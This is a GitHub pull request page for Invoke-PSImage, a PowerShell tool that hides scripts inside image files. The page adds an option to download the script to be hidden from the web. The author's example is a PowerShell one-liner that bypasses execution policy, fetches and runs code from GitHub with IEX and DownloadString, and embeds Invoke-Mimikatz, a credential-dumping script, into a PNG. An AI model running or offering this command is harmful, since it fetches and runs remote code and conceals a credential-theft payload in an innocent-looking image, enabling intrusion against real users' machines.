Skip to content

Added ability to download script from web#6

Open
dxflatline wants to merge 3 commits intopeewpw:masterfrom
dxflatline:master
Open

Added ability to download script from web#6
dxflatline wants to merge 3 commits intopeewpw:masterfrom
dxflatline:master

Conversation

@dxflatline
Copy link
Copy Markdown

Using this mod you can have the script downloaded from web since it is easier for oneliners.
The parameters are now not mandatory though :(

powershell -noprofile -executionpolicy bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/dxflatline/Invoke-PSImage/master/Invoke-PSImage.ps1'); Invoke-PSImage -Image c:\temp\stc.jpg -Out C:\temp\stc-out.png -WebScript https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1

@killercoderz4
Copy link
Copy Markdown

good day sir. when i build a sample file that pop up calculator. sample ps1 file. i followed your steps as explained in the readme. it build the output png successfully. but when i run it , it doesn't trigger anything

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants